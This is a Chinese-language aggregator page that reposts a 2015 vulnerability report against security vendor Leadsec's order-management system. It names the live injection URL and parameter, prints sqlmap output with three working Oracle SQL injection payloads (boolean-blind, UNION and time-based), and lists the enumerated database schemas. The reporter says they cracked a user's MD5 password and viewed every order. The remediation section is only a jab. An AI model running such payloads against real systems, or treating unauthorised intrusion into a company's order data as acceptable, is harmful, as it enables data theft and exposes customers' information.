精选国内外互联网行业最新文章及报告,让网友获得最新的海内外互联网动态
当前位置:主页 > 互联网 > 网络安全 >

网御星云第二集某重要业务系统爆出SQL注入Oracle数据库订单信息

2015-01-20 11:41 来源: 编辑:admin

网御星云--一个不安全的安全厂商

网御星云的电子订单管理系统,可以爆sql注入。ORACLE数据库成功列出,随便找了个用户,破了md5加密,进入订单系统,所有订单一览无余。想问问你们,这个真的不重要吗,安全厂商……………………




给你看注入点:

http://agent.leadsec.com.cn/agent/countryProvinceChange.htm?currTime=Tue%20Jul%2001%202014%2009:15:09%20GMT+0800



POST参数:province=11

 

Place: POST

Parameter: province

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: province=11' AND 7266=7266 AND 'mGhp'='mGhp



Type: UNION query

Title: Generic UNION query (NULL) - 2 columns

Payload: province=11' UNION ALL SELECT CHR(113)||CHR(102)||CHR(113)||CHR(110)||CHR(113)||CHR(98)||CHR(86)||CHR(103)||CHR(105)||CHR(121)||CHR(109)||CHR(103)||CHR(115)||CHR(108)||CHR(122)||CHR(113)||CHR(122)||CHR(101)||CHR(116)||CHR(113),NULL FROM DUAL--



Type: AND/OR time-based blind

Title: Oracle AND time-based blind (heavy query)

Payload: province=11' AND 6075=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'gnDr'='gnDr

---

[09:21:53] [INFO] the back-end DBMS is Oracle

web application technology: Nginx, JSP

back-end DBMS: Oracle





>>>>>>>>>>>>>>>>>>>DATABASES>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

[*] CTXSYS

[*] DBSNMP

[*] EC_LEADSEC

[*] EC_VENUS

[*] EXFSYS

[*] FLOWS_030000

[*] FLOWS_FILES

[*] HR

[*] IX

[*] MDSYS

[*] OE

[*] OLAPSYS

[*] ORDSYS

[*] OUTLN

[*] PM

[*] SCOTT

[*] SH

[*] SOAU

[*] SPPROD

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] TSMSYS

[*] WK_TEST

[*] WKSYS

[*] WMSYS

[*] XDB




 

11.png


 

QQ截图20140704224142.png

 

修复方案:

你们是安全厂商呀。

标签
你喜欢的文章
返回首页
扫描微信
返回顶部